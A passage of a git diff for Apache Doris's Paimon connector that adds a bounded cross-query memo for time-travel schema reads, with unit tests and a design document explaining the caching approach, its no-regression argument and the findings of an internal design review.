    This memo lives on the long-lived per-catalog {@link PaimonConnector} (NOT on the per-query + * {@link PaimonConnectorMetadata}, which is rebuilt by {@code getMetadata} every query) and is injected + * into the metadata so the at-snapshot resolve can consult/populate it. It is cleared wholesale on + * REFRESH CATALOG (the connector is rebuilt → a fresh empty memo). + * + *

    Value = the raw {@link PaimonCatalogOps.PaimonSchemaSnapshot} (fields + partition-key + + * primary-key name lists) — the exact output of the {@link PaimonCatalogOps#schemaAt} schema-file read, + * which is a pure function of {@code (table-identity, schemaId)} because a committed paimon + * schemaId's schema content is write-once. The built {@code ConnectorTableSchema} is deliberately NOT + * cached: it embeds the live {@code coreOptions()} of the table, which are not keyed by schemaId and could + * go stale — so the metadata rebuilds it fresh per query from the live table while only the schema read is + * memoized. The single behavioral delta vs the pre-fix path is therefore "the {@code schemaAt} read is + * skipped on a repeat"; everything else is unchanged. + * + *

    No performance regression (by construction): on a miss the loader runs exactly as before plus + * an O(1) put; on a hit the {@code schemaAt} read is skipped (strictly faster); on overflow/eviction or a + * concurrent same-key double-load the value is simply re-read (= the pre-fix behavior). The value is + * immutable, so a cached entry is safe to share across queries and a flush never yields a stale read. + */ +final class PaimonSchemaAtMemo { + + /** Default best-effort bound; the keyspace (table, branch, schemaId) is naturally tiny. */ + static final int DEFAULT_MAX_SIZE = 10000; + + private final Map cache = new ConcurrentHashMap<>(); + private final int maxSize; + + PaimonSchemaAtMemo(int maxSize) { + this.maxSize = maxSize; + } + + /** + * Returns the schema-at-snapshot for {@code (handle, schemaId)}, loading it via {@code loader} (the + * {@link PaimonCatalogOps#schemaAt} read) only on a miss. + * + *

    The loader runs OUTSIDE any lock (no I/O under a lock; not {@code computeIfAbsent}). A concurrent + * same-key miss may load twice — harmless because the value is immutable and identical, and it equals + * the pre-fix per-query double load. A loader exception propagates before any insert, so failures are + * never negative-cached. + */ + PaimonCatalogOps.PaimonSchemaSnapshot getOrLoad(PaimonTableHandle handle, long schemaId, + Supplier loader) { + MemoKey key = new MemoKey(handle, schemaId); + PaimonCatalogOps.PaimonSchemaSnapshot hit = cache.get(key); + if (hit != null) { + return hit; + } + PaimonCatalogOps.PaimonSchemaSnapshot loaded = loader.get(); + // Best-effort size bound (honors the "bounded memo" requirement). The keyspace is + // (table, branch, schemaId) — naturally tiny — so this valve effectively never fires; values are + // immutable, so flushing only causes re-reads (= the pre-fix behavior), never a stale/wrong value. + if (cache.size() >= maxSize) { + cache.clear(); + } + PaimonCatalogOps.PaimonSchemaSnapshot prev = cache.putIfAbsent(key, loaded); + return prev != null ? prev : loaded; + } + + /** Test-only: current number of cached entries. */ + int size() { + return cache.size(); + } + + /** + * Cache key = the handle's identity (db, table, sysTableName, branchName) plus the pinned schemaId. + * + *

    The four identity fields MIRROR {@link PaimonTableHandle#equals}/{@link PaimonTableHandle#hashCode} + * (PaimonTableHandle:233-240). They are stored as extracted values rather than a retained + * {@link PaimonTableHandle} reference ON PURPOSE: a handle carries its loaded paimon {@code Table} + * (set via {@code setPaimonTable}), so keying on the handle would pin that {@code Table} in the cache + * for its lifetime. If {@code PaimonTableHandle}'s identity ever gains a field, mirror it here too. + */ + static final class MemoKey { + private final String databaseName; + private final String tableName; + private final String sysTableName; + private final String branchName; + private final long schemaId; + + MemoKey(PaimonTableHandle handle, long schemaId) { + this.databaseName = handle.getDatabaseName(); + this.tableName = handle.getTableName(); + this.sysTableName = handle.getSysTableName(); + this.branchName = handle.getBranchName(); + this.schemaId = schemaId; + } + + @Override + public boolean equals(Object o) { + if (this == o) { + return true; + } + if (!(o instanceof MemoKey)) { + return false; + } + MemoKey that = (MemoKey) o; + return schemaId == that.schemaId + && databaseName.equals(that.databaseName) + && tableName.equals(that.tableName) + && Objects.equals(sysTableName, that.sysTableName) + && Objects.equals(branchName, that.branchName); + } + + @Override + public int hashCode() { + return Objects.hash(databaseName, tableName, sysTableName, branchName, schemaId); + } + } +} diff --git a/fe/fe-connector/fe-connector-paimon/src/test/java/org/apache/doris/connector/paimon/PaimonConnectorMetadataMvccTest.java b/fe/fe-connector/fe-connector-paimon/src/test/java/org/apache/doris/connector/paimon/PaimonConnectorMetadataMvccTest.java index 68029a03b59345..803a978fff9f00 100644 --- a/fe/fe-connector/fe-connector-paimon/src/test/java/org/apache/doris/connector/paimon/PaimonConnectorMetadataMvccTest.java +++ b/fe/fe-connector/fe-connector-paimon/src/test/java/org/apache/doris/connector/paimon/PaimonConnectorMetadataMvccTest.java @@ -61,6 +61,14 @@ private static PaimonConnectorMetadata metadataWith(RecordingPaimonCatalogOps op return new PaimonConnectorMetadata(ops, Collections.emptyMap(), new RecordingConnectorContext()); } + // Builds a metadata sharing an EXTERNAL PaimonSchemaAtMemo, modelling two queries (each a fresh + // getMetadata() with its own catalog-ops) that share the connector-owned schema-at-snapshot memo. + private static PaimonConnectorMetadata metadataWith(RecordingPaimonCatalogOps ops, + PaimonSchemaAtMemo memo) { + return new PaimonConnectorMetadata( + ops, Collections.emptyMap(), new RecordingConnectorContext(), memo); + } + private static RowType rowType(String... columnNames) { RowType.Builder builder = RowType.builder(); for (String name : columnNames) { @@ -799,6 +807,104 @@ private static List columnNames(ConnectorTableSchema schema) { return names; } + // ============= getTableSchema(snapshot): cross-query schema-at-snapshot memo (FIX-B-MC2) ============= + + @Test + public void getTableSchemaAtSnapshotIsMemoizedAcrossQueries() { + // Two queries = two fresh PaimonConnectorMetadata (production builds one per query via + // getMetadata()), each with its OWN catalog-ops, sharing the connector-owned PaimonSchemaAtMemo. + PaimonSchemaAtMemo memo = new PaimonSchemaAtMemo(10000); + RecordingPaimonCatalogOps ops1 = new RecordingPaimonCatalogOps(); + RecordingPaimonCatalogOps ops2 = new RecordingPaimonCatalogOps(); + PaimonTableHandle handle = new PaimonTableHandle( + "db1", "t1", Collections.emptyList(), Collections.emptyList()); + // Transient table set -> resolveTable issues no getTable; only schemaAt reaches the ops seam. + handle.setPaimonTable(new FakePaimonTable( + "t1", rowType("id", "dt"), Collections.emptyList(), Collections.emptyList())); + PaimonCatalogOps.PaimonSchemaSnapshot atSchema = new PaimonCatalogOps.PaimonSchemaSnapshot( + rowType("id", "dt").getFields(), Arrays.asList("dt"), Collections.emptyList()); + ops1.schemaAt = atSchema; + ops2.schemaAt = atSchema; + ConnectorMvccSnapshot snapshot = ConnectorMvccSnapshot.builder().snapshotId(7L).schemaId(2L).build(); + + ConnectorTableSchema schema1 = metadataWith(ops1, memo).getTableSchema(null, handle, snapshot); + ConnectorTableSchema schema2 = metadataWith(ops2, memo).getTableSchema(null, handle, snapshot); + + // WHY: a repeated time-travel to the same (table, schemaId) must hit the connector-level memo and + // NOT re-read the schema file (restoring the legacy PaimonExternalMetaCache hit dropped by CACHE-P1). + // MUTATION: drop the memo -> the second query also calls schemaAt -> ops2.log gains "schemaAt:2". + Assertions.assertEquals(1, Collections.frequency(ops1.log, "schemaAt:2"), + "the first query must perform the schemaAt read"); + Assertions.assertFalse(ops2.log.contains("schemaAt:2"), + "the second query at the same schemaId must hit the memo and NOT re-read schemaAt"); + Assertions.assertEquals(columnNames(schema1), columnNames(schema2), + "both queries must resolve the same at-snapshot schema"); + } + + @Test + public void getTableSchemaAtSnapshotMemoIsKeyedBySchemaId() { + PaimonSchemaAtMemo memo = new PaimonSchemaAtMemo(10000); + RecordingPaimonCatalogOps ops1 = new RecordingPaimonCatalogOps(); + RecordingPaimonCatalogOps ops2 = new RecordingPaimonCatalogOps(); + PaimonTableHandle handle = new PaimonTableHandle( + "db1", "t1", Collections.emptyList(), Collections.emptyList()); + handle.setPaimonTable(new FakePaimonTable( + "t1", rowType("id"), Collections.emptyList(), Collections.emptyList())); + ops1.schemaAt = new PaimonCatalogOps.PaimonSchemaSnapshot( + rowType("id").getFields(), Collections.emptyList(), Collections.emptyList()); + ops2.schemaAt = new PaimonCatalogOps.PaimonSchemaSnapshot( + rowType("id", "v2").getFields(), Collections.emptyList(), Collections.emptyList()); + + metadataWith(ops1, memo).getTableSchema(null, handle, + ConnectorMvccSnapshot.builder().snapshotId(7L).schemaId(2L).build()); + metadataWith(ops2, memo).getTableSchema(null, handle, + ConnectorMvccSnapshot.builder().snapshotId(9L).schemaId(3L).build()); + + // WHY: a DIFFERENT schemaId is a different schema version (schema evolution), so it must NOT be + // served from schemaId=2's entry. MUTATION: drop schemaId from the key -> schemaId=3 hits + // schemaId=2's entry -> ops2 never reads -> "schemaAt:3" absent -> red. + Assertions.assertTrue(ops2.log.contains("schemaAt:3"), + "a different schemaId must miss the memo and read its own schema"); + } + + @Test + public void getTableSchemaAtSnapshotMemoIsKeyedByBranch() { + PaimonSchemaAtMemo memo = new PaimonSchemaAtMemo(10000); + // Query 1: BASE handle at schemaId=2 (transient table set -> no reload). + RecordingPaimonCatalogOps baseOps = new RecordingPaimonCatalogOps(); + PaimonTableHandle baseHandle = new PaimonTableHandle( + "db1", "t1", Collections.emptyList(), Collections.emptyList()); + baseHandle.setPaimonTable(new FakePaimonTable( + "t1", rowType("id"), Collections.emptyList(), Collections.emptyList())); + baseOps.schemaAt = new PaimonCatalogOps.PaimonSchemaSnapshot( + rowType("id").getFields(), Collections.emptyList(), Collections.emptyList()); + // Query 2: BRANCH handle (db1.t1@b1) at the SAME schemaId=2; withBranch clears the transient table + // so resolveTable reloads the branch table, whose at-schemaId schema differs (bid, bdt). + RecordingPaimonCatalogOps branchOps = new RecordingPaimonCatalogOps(); + PaimonTableHandle branchHandle = new PaimonTableHandle( + "db1", "t1", Collections.emptyList(), Collections.emptyList()).withBranch("b1"); + branchOps.branchTable = new FakePaimonTable( + "t1", rowType("bid", "bdt"), Collections.emptyList(), Collections.emptyList()); + branchOps.schemaAt = new PaimonCatalogOps.PaimonSchemaSnapshot( + rowType("bid", "bdt").getFields(), Arrays.asList("bdt"), Collections.emptyList()); + ConnectorMvccSnapshot snapshot = ConnectorMvccSnapshot.builder().snapshotId(7L).schemaId(2L).build(); + + ConnectorTableSchema baseSchema = + metadataWith(baseOps, memo).getTableSchema(null, baseHandle, snapshot); + ConnectorTableSchema branchSchema = + metadataWith(branchOps, memo).getTableSchema(null, branchHandle, snapshot); + + // WHY: the same schemaId on a different BRANCH is a different schema, so the branch query must miss + // the base entry and read its own. MUTATION: drop branchName from the key -> the branch query hits + // the base entry -> (a) branchOps never reads "schemaAt:2" AND (b) branch columns == base [id] -> red. + Assertions.assertTrue(branchOps.log.contains("schemaAt:2"), + "a branch handle at the same schemaId must miss the base entry and read the branch schema"); + Assertions.assertEquals(Arrays.asList("bid", "bdt"), columnNames(branchSchema), + "the branch query must return the branch schema, not a base value cached under a branch-blind key"); + Assertions.assertEquals(Collections.singletonList("id"), columnNames(baseSchema), + "sanity: the base query returns the base schema"); + } + // ==================== applySnapshot ==================== @Test diff --git a/fe/fe-connector/fe-connector-paimon/src/test/java/org/apache/doris/connector/paimon/PaimonSchemaAtMemoTest.java b/fe/fe-connector/fe-connector-paimon/src/test/java/org/apache/doris/connector/paimon/PaimonSchemaAtMemoTest.java new file mode 100644 index 00000000000000..a47dd7cc75e633 --- /dev/null +++ b/fe/fe-connector/fe-connector-paimon/src/test/java/org/apache/doris/connector/paimon/PaimonSchemaAtMemoTest.java @@ -0,0 +1,117 @@ +// Licensed to the Apache Software Foundation (ASF) under one +// or more contributor license agreements. See the NOTICE file +// distributed with this work for additional information +// regarding copyright ownership. The ASF licenses this file +// to you under the Apache License, Version 2.0 (the +// "License"); you may not use this file except in compliance +// with the License. You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, +// software distributed under the License is distributed on an +// "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY +// KIND, either express or implied. See the License for the +// specific language governing permissions and limitations +// under the License. + +package org.apache.doris.connector.paimon; + +import org.junit.jupiter.api.Assertions; +import org.junit.jupiter.api.Test; + +import java.util.Collections; +import java.util.concurrent.atomic.AtomicInteger; + +/** + * Unit tests for {@link PaimonSchemaAtMemo} (FIX-B-MC2): the bounded, immutable second-level memo of the + * time-travel schema-at-snapshot read. Verifies key dedup (the cross-query hit), that every component of + * the handle identity participates in the key (the {@code sysName} Rule-9 guard), and that the bound + * degrades to a re-read rather than ever serving a stale value (the no-regression "worst case = current"). + */ +public class PaimonSchemaAtMemoTest { + + private static PaimonTableHandle handle(String db, String table) { + return new PaimonTableHandle(db, table, Collections.emptyList(), Collections.emptyList()); + } + + private static PaimonCatalogOps.PaimonSchemaSnapshot snap() { + return new PaimonCatalogOps.PaimonSchemaSnapshot( + Collections.emptyList(), Collections.emptyList(), Collections.emptyList()); + } + + @Test + public void sameKeyLoadsOnce() { + PaimonSchemaAtMemo memo = new PaimonSchemaAtMemo(100); + PaimonTableHandle h = handle("db", "t"); + AtomicInteger loads = new AtomicInteger(); + + memo.getOrLoad(h, 5L, () -> { + loads.incrementAndGet(); + return snap(); + }); + memo.getOrLoad(h, 5L, () -> { + loads.incrementAndGet(); + return snap(); + }); + + // WHY: a repeat (handle, schemaId) must be a memo hit — the whole point of FIX-B-MC2 (restore the + // legacy cross-query schemaAt hit). MUTATION: never caching -> 2 loads -> red. + Assertions.assertEquals(1, loads.get(), "the same (handle, schemaId) must load exactly once"); + Assertions.assertEquals(1, memo.size()); + } + + @Test + public void sysTableNameDistinguishesKey() { + // Two handles equal in (db, table, branch, schemaId) but differing ONLY in sysTableName. + PaimonSchemaAtMemo memo = new PaimonSchemaAtMemo(100); + PaimonTableHandle base = handle("db", "t"); + PaimonTableHandle sys = PaimonTableHandle.forSystemTable("db", "t", "snapshots", false); + AtomicInteger loads = new AtomicInteger(); + + memo.getOrLoad(base, 5L, () -> { + loads.incrementAndGet(); + return snap(); + }); + memo.getOrLoad(sys, 5L, () -> { + loads.incrementAndGet(); + return snap(); + }); + + // WHY: sysName is part of table identity (a sys table is a distinct table with its own rowType); + // the key must not collide a base table with its system table. MUTATION: drop sysTableName from + // MemoKey -> one load -> red. + Assertions.assertEquals(2, loads.get(), "base and its system table must be distinct memo keys"); + } + + @Test + public void overflowEvictsAndReReadsNeverStale() { + // Bound = 2: inserting a 3rd distinct key flushes the map; a previously-cached key then re-loads + // (a re-read = the pre-fix behavior), proving eviction degrades to a re-read, never a stale value. + PaimonSchemaAtMemo memo = new PaimonSchemaAtMemo(2); + AtomicInteger loads = new AtomicInteger(); + + memo.getOrLoad(handle("db", "t1"), 1L, () -> { + loads.incrementAndGet(); + return snap(); + }); + memo.getOrLoad(handle("db", "t2"), 1L, () -> { + loads.incrementAndGet(); + return snap(); + }); + // size() == 2 == bound -> this insert clears, then puts t3. + memo.getOrLoad(handle("db", "t3"), 1L, () -> { + loads.incrementAndGet(); + return snap(); + }); + Assertions.assertEquals(3, loads.get()); + + // t1 was flushed by the overflow -> re-loads now (never serves a stale value). + memo.getOrLoad(handle("db", "t1"), 1L, () -> { + loads.incrementAndGet(); + return snap(); + }); + Assertions.assertEquals(4, loads.get(), "an evicted key must re-read (never serve a stale value)"); + Assertions.assertTrue(memo.size() <= 2, "the memo must stay bounded"); + } +} diff --git a/plan-doc/designs/FIX-B-MC2-SCHEMA-AT-MEMO-design.md b/plan-doc/designs/FIX-B-MC2-SCHEMA-AT-MEMO-design.md new file mode 100644 index 00000000000000..a0b9a4c16a1a59 --- /dev/null +++ b/plan-doc/designs/FIX-B-MC2-SCHEMA-AT-MEMO-design.md @@ -0,0 +1,249 @@ +# FIX-B-MC2 — time-travel schema-at-snapshot second-level memo (NO PERF REGRESSION) + +> Source: `task-list-P6-deviation-fixes.md` §B-MC2 + `reviews/P6-paimon-fullpath-cleanroom-2026-06-18.md` §MC2. +> Single-task loop: design → **design red-team (DONE, `wf_903bf4e9-3a4`)** → implement → impl-verify → build+UT. +> Hard constraint: **NO performance regression** — the no-regression argument below MUST hold and WAS +> red-team-verified. **This doc reflects the post-red-team revisions** (see §Red-team adjudication at the end). + +## Problem + +Time-travel reads (`FOR VERSION/TIME AS OF`, `@tag`, `@branch`) resolve the schema AS OF the pinned +schemaId through `PaimonConnectorMetadata.getTableSchema(session, handle, snapshot)` → +`catalogOps.schemaAt(table, snapshot.getSchemaId())` (`PaimonConnectorMetadata.java:221-222`). That +`schemaAt` is a paimon `schemaManager().schema(schemaId)` read (a schema-file round-trip, +`PaimonCatalogOps.java:321-327`). It runs on **every query** and the result is pinned only to the +per-statement `PluginDrivenMvccSnapshot` (`PluginDrivenMvccExternalTable.java:260-262`). Repeated +time-travel to the same snapshot re-reads the schema file each time. + +Legacy served this from the shared catalog-level `PaimonExternalMetaCache` keyed by +`(NameMapping, schemaId)` — a repeat time-travel to the same schemaId was a cache **hit**. The SPI +cutover (review tag CACHE-P1) dropped that second-level cache; only the **latest** schema stays cached +(via the bridge's generic schema cache — see "Latest path untouched" below). + +Severity: **NIT** (CACHE-P1). Diagnostic/perf only, no correctness impact — but the user elected to fix +it (restore the legacy hit) rather than accept-as-deviation. + +## Root cause + +`PaimonConnector.getMetadata(session)` returns a **fresh** `new PaimonConnectorMetadata(...)` on every +call (`PaimonConnector.java:94-97`), and fe-core calls `getMetadata(session)` **once per query** +(`PluginDrivenMvccExternalTable.java:122,218` and every other call site). So the metadata object is a +per-query throwaway: nothing on it persists the at-snapshot schema across queries. The legacy cache lived +on the long-lived catalog-level metacache; the cutover has no equivalent on the time-travel path. + +**Consequence for the fix's home (critical):** a memo stored as an *instance field of +`PaimonConnectorMetadata`* would give **zero** cross-query benefit (it would die with the per-query +metadata object after its single `schemaAt`). The memo's **storage must live on the long-lived +`PaimonConnector`** (one per catalog), and be *injected into* the per-query metadata so the at-snapshot +resolve can consult/populate it. (`PaimonTableResolver` is a stateless static utility — `final class`, +private ctor — so it is NOT a home for cross-query state.) + +## Design + +**Connector-side, immutable, bounded memo of the `schemaAt` read. Bridge UNCHANGED. SPI UNCHANGED.** + +### What is memoized (post-red-team): the raw `PaimonSchemaSnapshot`, NOT the built `ConnectorTableSchema` + +The red-team (MAJOR, REAL) showed the built `ConnectorTableSchema` is **not** a pure function of the +schemaId key: `buildTableSchema` sources its `properties` from the **live** table — +`schemaProps.putAll(((DataTable) table).coreOptions().toMap())` (`PaimonConnectorMetadata.java:251-252`), +where `table = resolveTable(handle)` is the LATEST table. Caching the built schema would freeze the live +`coreOptions` under a schemaId key and could serve stale PROPERTIES after an external `ALTER…SET OPTION` +without REFRESH (D-046 SHOW CREATE TABLE PROPERTIES channel) — a violation of "never return stale data +than today". + +So we memoize the **`PaimonCatalogOps.PaimonSchemaSnapshot`** (fields + partitionKeys + primaryKeys — +the exact output of the `schemaAt` schema-file read), which **IS** a pure function of +`(table-identity, schemaId)` (a committed schemaId's schema content is write-once). `ConnectorTableSchema` +is rebuilt fresh per query from the live `resolveTable` table, so `coreOptions`/`properties` stay LIVE = +byte-identical to today. The ONLY behavioral delta vs today is: **the `schemaAt` schema-file read is +skipped on a repeat**. `resolveTable` and `buildTableSchema` still run every query (unchanged). + +### Components + +1. **New tiny class `PaimonSchemaAtMemo`** (package-private, in `fe-connector-paimon`): + - Storage = plain **`ConcurrentHashMap`** (matches the + module convention — the only long-lived caches in fe-connector-paimon are plain `ConcurrentHashMap`, + `PaimonConnector.java:81-82`; lock-free reads; no new dependency). + - **`MemoKey`** = immutable holder of the handle's **extracted identity** `(databaseName, tableName, + sysTableName, branchName, schemaId)` built in `new MemoKey(PaimonTableHandle handle, long schemaId)`. + It mirrors `PaimonTableHandle.equals/hashCode`, which key on exactly + `(databaseName, tableName, sysTableName, branchName)` (`PaimonTableHandle.java:233-240`, `scanOptions` + correctly excluded from identity). **Extracted fields, NOT a retained handle reference** — deliberate: + a `PaimonTableHandle` carries its loaded paimon `Table` (`setPaimonTable`), so retaining the handle as + a map key would pin that `Table` (catalog/schema/IO refs) in the cache for its lifetime. Extracting the + four `String`/`long` identity fields avoids that memory pin at the cost of a documented sync-point with + the handle's identity (a comment in `MemoKey` points to `PaimonTableHandle:233-240`). This is a + deliberate deviation from the red-team's "delegate to handle.equals" suggestion, which did not account + for `Table`-pinning. Branch is load-bearing (same schemaId on different branches = different schema; + `branchName` is live on the pinned handle via `applySnapshot→withBranch`). `sysName` is a forward-compat + guard (sys tables don't reach this path today, but a key collision would be a correctness bug). + - **Bound (best-effort, honors task-list "bounded (maxSize)"):** before a `put`, if `size() >= MAX`, + `clear()` the map. Crude but correct: values are immutable, so a flush only causes re-reads + (= today), never a stale/wrong value. The keyspace is `(table, branch, schemaId)` — naturally tiny — + so this safety valve effectively never fires; `MAX` is a generous constant (proposed `10000`). The + map is also freed wholesale on REFRESH (connector rebuild). + - `PaimonSchemaSnapshot getOrLoad(PaimonTableHandle handle, long schemaId, Supplier loader)`: + ``` + MemoKey k = new MemoKey(handle, schemaId); + PaimonSchemaSnapshot hit = cache.get(k); // lock-free + if (hit != null) return hit; + PaimonSchemaSnapshot loaded = loader.get(); // the schemaAt I/O — OUTSIDE any lock + if (cache.size() >= MAX) { // best-effort bound + cache.clear(); + } + PaimonSchemaSnapshot prev = cache.putIfAbsent(k, loaded); + return prev != null ? prev : loaded; // canonicalize on a concurrent race + ``` + The loader runs without any lock (no I/O-under-lock, no `computeIfAbsent`). A concurrent same-key + miss may double-load (rare) — harmless: the value is immutable and identical (same schemaId), and a + double-load equals today's two independent per-query loads, never worse. A loader exception + propagates BEFORE any `put`, so failures are never negative-cached. + +2. **`PaimonConnector`**: add `private final PaimonSchemaAtMemo schemaAtMemo = new PaimonSchemaAtMemo(MAX);` + and pass it into the metadata: `new PaimonConnectorMetadata(catalogOps, properties, context, schemaAtMemo)`. + The connector is one-per-catalog and set to `null` on `onClose()` + (`PluginDrivenExternalCatalog.java:557`), which REFRESH CATALOG triggers via + `resetToUninitialized()→onClose()`; the next access rebuilds the connector → **fresh empty memo**. So + REFRESH is the (only needed) invalidation. + +3. **`PaimonConnectorMetadata`**: + - New **package-private** 4-arg ctor `(catalogOps, properties, context, schemaAtMemo)` storing the memo. + Package-private (not public) keeps the connector surface minimal (Rule 3); the cross-query-hit test + lives in the same package `org.apache.doris.connector.paimon` and constructs both metadata instances + through it with a shared `PaimonSchemaAtMemo`. + - Keep the existing **public** 3-arg ctor delegating to the 4-arg with a **fresh per-instance** + `new PaimonSchemaAtMemo(MAX)`. This keeps all ~15 existing test construction sites compiling + unchanged; their single-resolve behavior is identical (first call is always a miss → load). + - In `getTableSchema(session, handle, snapshot)` (the at-snapshot overload), the **only** change is the + `schemaId >= 0` branch (the `< 0` latest fallback at line 216-217 is untouched). **`resolveTable` is + called ONCE, outside the loader**, so the branch-handle `getTable` reload happens at most once per + query = today: + ``` + PaimonTableHandle paimonHandle = (PaimonTableHandle) handle; + long schemaId = snapshot.getSchemaId(); + Table table = resolveTable(paimonHandle); // once — keeps branch getTable == today + PaimonCatalogOps.PaimonSchemaSnapshot schema = + schemaAtMemo.getOrLoad(paimonHandle, schemaId, () -> catalogOps.schemaAt(table, schemaId)); + return buildTableSchema(paimonHandle.getTableName(), table, + schema.fields(), schema.partitionKeys(), schema.primaryKeys()); + ``` + +## NO-regression argument (must hold + WAS red-team-verified) + +1. **The memoized value is a pure function of the key → no stale read, no TTL.** We cache only + `PaimonSchemaSnapshot` (fields/partitionKeys/primaryKeys of a *committed* schemaId), which is write-once + in paimon (rollback/ALTER mint *new* ids; a re-pointed tag resolves a *new* schemaId at resolve-time → + a different key, never a stale hit). The live-bound `coreOptions`/`properties` are NOT cached — they are + rebuilt per query from the live table, so they stay current (the red-team MAJOR that killed the + `ConnectorTableSchema`-memo). The only invalidation is REFRESH CATALOG (connector rebuild → fresh memo). +2. **Latest path untouched.** The memo is consulted **only** on the `schemaId >= 0` at-snapshot branch. + `schemaId < 0` (latest / system tables) still delegates to `getTableSchema(session, handle)` (line + 216-217), cached cross-query by the bridge's generic schema cache (`getSchemaCacheValue → + getLatestSchemaCacheValue → super`). The 2-arg latest `getTableSchema` (called from + `PluginDrivenExternalTable:172`) is untouched — no double-caching. +3. **Worst case = current.** On a miss: `resolveTable` + `schemaAt` + `buildTableSchema` (= today) + an + O(1) hash put. On a hit: `resolveTable` + `buildTableSchema` (= today) with the `schemaAt` read + **skipped** (strictly faster, = legacy). On overflow/eviction or a concurrent double-load: a re-read = + today. The memo NEVER does more work than today on any path. + +## Implementation Plan + +- New file `fe-connector-paimon/.../PaimonSchemaAtMemo.java` (ASF header, javadoc, `ConcurrentHashMap` + + `MemoKey` + `getOrLoad` + `size()` test accessor). +- `PaimonConnector.java`: add the `schemaAtMemo` field; pass it in `getMetadata`. +- `PaimonConnectorMetadata.java`: package-private 4-arg ctor + public 3-arg delegate; memo-wrap the + `schemaId>=0` branch of the 3-arg `getTableSchema` (resolveTable once, outside the loader). +- No SPI/bridge/BE change. `tools/check-connector-imports.sh` stays exit 0 (only `java.util.concurrent.*` + + `java.util.function.Supplier` + existing connector/paimon imports added; verified the allowlist does + not match these). + +## Risk Analysis + +- **Thread-safety:** `ConcurrentHashMap` (lock-free reads); loader runs outside any lock; immutable value + → safe publication via the concurrent map. No iteration. The size-guard `clear()` is best-effort under + concurrency (worst case a few extra re-reads — never a correctness issue). +- **Stale properties:** eliminated by memoizing `PaimonSchemaSnapshot` (not the live-bound built schema). +- **Key correctness:** delegates to `PaimonTableHandle.equals/hashCode` (db+table+sysName+branch) — no + re-listed second identity site, no cross-branch/cross-sys collision. schemaId<0 never builds a key. +- **Ctor blast radius:** only the connector-internal ctor changes; the SPI `ConnectorMetadata` interface + is untouched; the public 3-arg ctor is retained → no test/site churn. +- **Memory:** best-effort bounded by `MAX`; per-catalog; freed on REFRESH/close. +- **Checkstyle:** new file needs license header + class/field javadoc; runs in `validate` phase. + +## Test Plan + +### Unit Tests (`PaimonConnectorMetadataMvccTest` new tests, RED→GREEN verified by separate runs) + +Drive via the recording seam; count underlying `schemaAt` reads through `ops.log` ("schemaAt:N"). Use a +**shared memo across two metadata instances** (each its own `RecordingPaimonCatalogOps`) to model two +queries (each query = a fresh `getMetadata` in production, sharing the connector-owned memo). The 4-arg +package-private ctor makes this construction compilable in-package. + +1. **Cross-query hit (non-branch):** ops1 + ops2 share ONE `PaimonSchemaAtMemo`, both configured with the + same `schemaAt`. Resolve the same `(handle, schemaId=2)` on metadata1 then metadata2. Assert ops1.log + contains `schemaAt:2` exactly once and **ops2.log contains NO `schemaAt`** (the second resolve hit the + memo — the primary RED→GREEN signal). Both results are value-equal. **MUTATION (RED):** remove the memo + → ops2 also reads → ops2.log gains `schemaAt:2`. +2. **Different schemaId → reads again:** shared memo, resolve schemaId=2 then schemaId=3 → distinct keys → + ops sees both `schemaAt:2` and `schemaAt:3`. +3. **Different branch, same schemaId → reads again (branch-in-key guard):** two-ops-shared-memo; ops1 = + base handle, ops2 = `withBranch("b1")` handle with `ops2.branchTable` carrying `bid/bdt` (mirroring the + existing branch test at `PaimonConnectorMetadataMvccTest.java:963-993`), both at schemaId=2. Assert + BOTH: **(a)** the BRANCH ops2.log contains `schemaAt:2` (the branch resolve actually read — was NOT a + cross-branch memo hit) AND **(b)** the branch-handle result columns equal `[bid,bdt]` and differ from + the base-handle result columns `[id]` (the branch returned the branch schema, not a stale base value + cached under a branch-blind key). **MUTATION (RED):** drop the branch component from the key → branch + resolve hits → (a) and (b) both go RED. +4. **Latest path unaffected:** schemaId<0 resolve does not consult the memo (no `schemaAt`); the existing + `getTableSchemaWithNegativeSchemaIdFallsBackToLatest` already pins this. +5. **Existing exact-equality at-snapshot + branch tests** keep passing unchanged (single resolve = miss = + identical result; per-instance memo via the 3-arg ctor). + +### Micro-tests (`PaimonSchemaAtMemoTest`) + +- **schemaId-keyed dedup:** two `getOrLoad` calls for the same `(handle, schemaId)` with a counting + `Supplier` → loader invoked ONCE. +- **sysName-distinguishing (Rule 9 guard for the sysName key component):** two handles equal in + `(db, table, branch, schemaId)` but differing in `sysTableName` (one via + `PaimonTableHandle.forSystemTable`, mirroring the test `sysHandle` helper) → two distinct loads (a + sysName-blind key would yield one). +- **bound/eviction (honors "bounded"):** put `MAX+1` distinct keys, assert the map stays bounded and an + evicted key re-loads on next access (proves eviction degrades to a re-read, never a stale value) — + validates the no-regression "worst case = current" claim directly. + +### E2E + +Gated (`enablePaimonTest=false`) — **NOT run**; note as gated in the summary. The UT cross-query-hit test +is the authoritative proof; a live e2e would only observe a latency delta, not a correctness change. + +## Files + +- NEW `fe/fe-connector/fe-connector-paimon/.../PaimonSchemaAtMemo.java` +- `fe/fe-connector/fe-connector-paimon/.../PaimonConnector.java` +- `fe/fe-connector/fe-connector-paimon/.../PaimonConnectorMetadata.java` +- `fe/fe-connector/fe-connector-paimon/.../test/.../PaimonConnectorMetadataMvccTest.java` (new tests) +- NEW `fe/fe-connector/fe-connector-paimon/.../test/.../PaimonSchemaAtMemoTest.java` + +## Red-team adjudication (`wf_903bf4e9-3a4`, 4 lenses → per-finding verify) + +All four lensVerdicts judged the design **structurally sound** on lifecycle, no-regression, tests, and +scope. 6 actionable findings adopted (incorporated above): + +- **MAJOR (REAL):** built-`ConnectorTableSchema` memo serves stale live `coreOptions` → **switched the + memoized value to `PaimonSchemaSnapshot`** (pure function of the key); rebuild `ConnectorTableSchema` + per query so options stay live. +- **MINOR (REAL):** hand-rolled 5-field `Key` duplicates `PaimonTableHandle` identity → **`MemoKey(handle, + schemaId)` delegating to `handle.equals/hashCode`** (drift-proof, ~40 fewer lines). +- **NIT (PARTIAL):** LRU/synchronizedMap over-engineered vs module convention → **plain `ConcurrentHashMap` + + best-effort clear-on-overflow bound**; NOT `computeIfAbsent` (loader I/O must stay off any lock). +- **MAJOR→test (PARTIAL):** branch Test 3 underspecified → **hardened to assert the branch actually read + + columns differ**. +- **MINOR (REAL):** no test guards the `sysName` key component → **added the sysName-distinguishing + 